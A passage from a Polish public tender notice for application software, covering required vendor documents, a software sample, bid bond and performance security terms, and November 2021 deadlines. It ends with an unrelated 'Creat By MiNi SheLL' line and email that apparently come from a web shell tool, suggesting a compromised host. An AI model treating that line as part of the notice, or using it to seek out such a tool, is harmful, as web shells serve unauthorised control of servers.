art. 117 ust. 4 ustawy Pzp; wzór stanowi załącznik nr 7 do SWZ.2.<br/>Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień<br/>złożenia podmiotowych środków dowodowych:2.1.oświadczenie wykonawcy, w zakresie art. 108 ust. 1<br/>pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia<br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do<br/>tej samej grupy kapitałowej - wzór oświadczenia stanowi Załącznik nr 5 do SWZ;2.2.odpis lub<br/>informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Jeżeli<br/>Zamawiający posiada te dokumenty lub może je uzyskać za pomocą bezpłatnych ogólnodostępnych<br/>baz danych zgodnie z art. 127 ust. 1 pkt 1 ustawy Pzp nie będzie wzywał do ich złożenia o ile<br/>Wykonawca wskazał dane umożliwiające dostęp do tych środków. 1.Jeżeli Wykonawca ma siedzibę<br/>lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których<br/>mowa w ust. 2.4 składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma<br/>siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami,<br/>jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on winnej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>2.Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w ust. 3, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania wykonawcy. 3.Dokumenty o których mowa w ust. 2.4 lub ust. 3 i 4<br/>powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. -Pozostałe dokumenty w<br/>tym dla wykonawców niemających siedziby w RP określono w SWZ rozdz. VIII.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu dotyczących zdolności technicznej lub zawodowej, Wykonawca złoży wykaz dostaw<br/>lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych<br/>nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy (zgodnie z § 9 ust. 1 pkt. 2 Rozporządzenia<br/>Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy) – szczegółowy opis warunku zawiera rozdział VI SWZ; wzór stanowi załącznik nr 8 do<br/>SWZ.<br/>2.2. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu<br/>dotyczących zdolności technicznej lub zawodowej, Wykonawca złoży wykaz osób, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie<br/>usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami (zgodnie z § 9 ust. 1 pkt. 3 Rozporządzenia Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy) –<br/>szczegółowy opis warunku zawiera rozdział VI SWZ.; wzór stanowi załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający, na podstawie art. 105-106 ustawy Pzp, na potwierdzenie zgodności<br/>oferowanych dostaw z wymaganiami określonymi w opisie przedmiotu zamówienia żąda<br/>złożenia wraz z ofertą następujący przedmiotowy środek dowodowy:<br/>1.1. Próbkę zaoferowanego przez Wykonawcę Oprogramowania Aplikacyjnego (zgodną z<br/>Wymaganiami dla próbki oraz sposobem i zakresem prezentacji, które stanowią Załącznik nr 11<br/>do SWZ).<br/>1.2. W celu potwierdzenia zgodności oferowanych parametrów, wynikających z opisu<br/>przedmiotu zamówienia (OPZ), Zamawiający wymaga przedłożenia Specyfikacji technicznych w<br/>języku polskim, lub innym języku z tłumaczeniem na język polski, poświadczone za zgodność z<br/>oryginałem przez Wykonawcę, umożliwiające ich weryfikację. Wykonawca w dostarczonych<br/>dokumentach wskaże, której pozycji lub elementu dotyczy. W przypadku braku któregoś z<br/>parametrów w firmowych materiałach informacyjnych, Wykonawca zobowiązany jest do potwierdzenia tych danych stosownym oświadczeniem, podpisanym przez osobę upoważnioną<br/>do reprezentowania Wykonawcy (co do zasady, oświadczenie nie dotyczy parametrów<br/>kluczowych, które np. potwierdzają główną funkcjonalność sprzętu).Zapisy art. 107 ustawy Pzp mają zastosowanie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 2. Jeżeli wykonawca nie złożył przedmiotowych środków dowodowych o których lub złożone przedmiotowe środki dowodowe są niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie, zgodnie z zapisami art. 107 ustawy Pzp.<br/>3. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych (art. 107 ust. 4 ustawy Pzp).<br/>4. W toku badania i oceny ofert zamawiający może żądać od Wykonawców wyjaśnień<br/>dotyczących treści złożonych ofert oraz przedmiotowych środków dowodowych.<br/>5. Wymagania dotyczące sposobu i zakresu prezentacji złożonej wraz z oferta próbki Oprogramowania Aplikacyjnego, zostały zawarte w Wymaganiach dla próbki oraz sposobie i zakresu prezentacji, które stanowią Załącznik nr 11 do SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę składa się: 1)wypełniony i podpisany elektronicznie przez osoby upoważnione do<br/>reprezentowania Wykonawcy Formularz ofertowy (wzór stanowi Załącznik Nr 1 do SWZ) -<br/>Formularz nie podlega uzupełnieniu na podstawie art. 128 ustawy Pzp;2)wypełniony i podpisany<br/>elektronicznie przez osoby upoważnione do reprezentowania Wykonawcy Formularz<br/>asortymentowo – cenowy – (wzór stanowi Załącznik Nr 2 do SWZ) Formularz jest częścią oferty i<br/>nie podlega uzupełnieniu na podstawie art. 128 ustawy Pzp;3)dokumenty lub oświadczenia<br/>określone w SWZ rozdział IV PRZEDMIOTOWE ŚRODKI DOWODOWE podpisane przez osoby<br/>upoważnione do reprezentowania Wykonawcy;4)Oświadczenie Wykonawcy o spełnianiu<br/>warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – wzór<br/>oświadczenia stanowi Załącznik nr 3 i 4 do SWZ;3.1)w przypadku wspólnego ubiegania się o<br/>zamówienie przez Wykonawców oświadczenie składa każdy z nich; 5)Pełnomocnictwo<br/>upoważniające do złożenia oferty, o ile ofertę składa Pełnomocnik lub w przypadku oferty<br/>składanej wspólnie Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających<br/>się o zamówienie. Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej<br/>samej formie jak składana oferta, tj. w formie elektronicznej lub postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Dopuszcza się także złożenie elektronicznej kopii (skanu)pełnomocnictwa sporządzonego<br/>uprzednio w formie pisemnej, w postaci elektronicznego poświadczenia sporządzonego<br/>stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r – Prawo o notariacie, które to<br/>poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez<br/>opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym mocodawcy,<br/>wystawionego na reprezentanta Wykonawcy przez osoby do tego umocowane. Elektroniczna<br/>kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego; 6)w przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w art.<br/>117 ust. 4 ustawy Pzp, z którego wynika, które dostawy lub usługi wykonają poszczególni<br/>wykonawcy.7)Zobowiązanie podmiotu udostępniającego zasoby lub Wykonawców ubiegających<br/>się o zamówienie wspólnie (jeżeli dotyczy). 8.W przypadku, gdyby oferta zawierała informacje<br/>stanowiące tajemnicę przedsiębiorstwa w rozumieniu art. 11 ust. 2 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (tekst jednolity Dz. U. z 2020 r., poz. 1913),<br/>Wykonawca, winien w sposób nie budzący wątpliwości zastrzec, które z zawartych w ofercie<br/>informacji stanowią tajemnicę przedsiębiorstwa, a następnie w celu utrzymania w poufności tych<br/>informacji, złożyć je w wydzielonym pliku oraz oznaczyć informacją – TAJEMNICA<br/>PRZEDSIĘBIORSTWA. UWAGA: Wykonawca składając ofertę poprzez miniPortal zobowiązany jest zaznaczyć dokumenty, które zawierają tajemnicę przedsiębiorstwa. W przeciwnym razie dokumenty zostaną potraktowane jako jawne w całości. Wykonawca wraz z przekazaniem<br/>informacji stanowiących tajemnicę przedsiębiorstwa zobowiązany jest zastrzec je oraz wykazać,<br/>że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa zgodnie z art. 18 ust. 3 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia wadium w wysokości: 10000,00 zł (słownie: dziesięć tysięcy złotych). 2.Wykonawca wnosi wadium w jednej lub kilku następujących formach: 1)pieniądzu:<br/>wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego 42<br/>1020 1332 0000 1502 1053 4073 z adnotacją „Wadium – Postępowanie nr „OI.271.2.2021”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania<br/>rachunku Zamawiającego. 2)gwarancjach bankowych; 3) gwarancjach ubezpieczeniowych;<br/>4)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 3.Wadium wnosi<br/>się przed upływem terminu składania ofert, na cały okres związania ofertą. 4.Dokument<br/>potwierdzający wniesienie wadium w jednej z w/w form niepieniężnych, powinien być złożone w<br/>oryginale w postaci dokumentu elektronicznego i musi obejmować cały okres związana ofertą.<br/>Oryginał wadium, sporządzony w postaci dokumentu elektronicznego musi być podpisany<br/>kwalifikowanym podpisem elektronicznym przez Gwaranta (np. bank, ubezpieczyciel) i powinien<br/>być złożony za pośrednictwem miniPortalu wraz z ofertą. W przypadku Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, w dokumencie ustanawiającym wadium wymagane<br/>jest wymienienie wszystkich Wykonawców lub aby z treści dokumentu wynikało, że zabezpiecza<br/>ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 5.Gwarancja lub<br/>poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy<br/>dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium, płatne na pierwsze pisemne<br/>żądanie Zamawiającego. 6.Zamawiający zatrzymuje wadium na zasadach określonych w art. 98<br/>ust.6 ustawy Pzp. 7.Zamawiający zwraca wadium zgodnie z zasadami określonymi w art. 98 ust.1 - 5 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zamawiający wymaga od wykonawcy zabezpieczenia należytego wykonania umowy w<br/>wysokości 5% ceny całkowitej brutto podanej w ofercie.<br/>2. Zabezpieczenie może być wnoszone, według wyboru Wykonawcy, w jednej lub w kilku<br/>następujących formach:<br/>1) pieniądzu, sposób wnoszenia – przelewem na rachunek zamawiającego.<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej,<br/>z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>3) gwarancjach bankowych;<br/>4) gwarancjach ubezpieczeniowych;<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. Zamawiający nie dopuszcza możliwości wniesienia zabezpieczenia w formach określonych w<br/>art. 450 ust. 2 ustawy Prawo zamówień publicznych.<br/>4. Zabezpieczenie wniesione w formie niepieniężnej winno zawierać zobowiązania gwaranta do bezwarunkowej i nieodwołalnej zapłaty zobowiązania stanowiącego zabezpieczenie należytego<br/>wykonania umowy, na pierwsze żądanie Zmawiającego zawierające oświadczenie, że<br/>Wykonawca nie uregulował swoich zobowiązań wynikających z zawartej umowy.<br/>5. W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zaliczenie<br/>kwoty wadium na poczet zabezpieczenia.<br/>6. W trakcie realizacji umowy wykonawca może dokonać zmiany formy zabezpieczenia na jedną<br/>lub kilka form, o których mowa w art. 450 ust. 1. Zmiana formy zabezpieczenia jest dokonywana<br/>z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości.<br/>7. 70 % wartości zabezpieczenia należytego wykonania umowy zostanie zwrócone w terminie<br/>30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane.<br/>8. Pozostałe 30 % wartości zabezpieczenia należytego wykonania umowy zostanie zwrócone nie później niż w 15 dniu po upływie okresu rękojmi za wady lub gwarancji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy związane z realizacją niniejszego zamówienia publicznego stanowi Załącznik Nr 11 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-17 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniPortal - https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-17 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 5. Wymagania dotyczące sposobu i zakresu prezentacji złożonej wraz z oferta próbki<br/>Oprogramowania Aplikacyjnego, zostały zawarte w Wymaganiach dla próbki oraz sposobie i zakresu prezentacji, które stanowią Załącznik nr 11 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com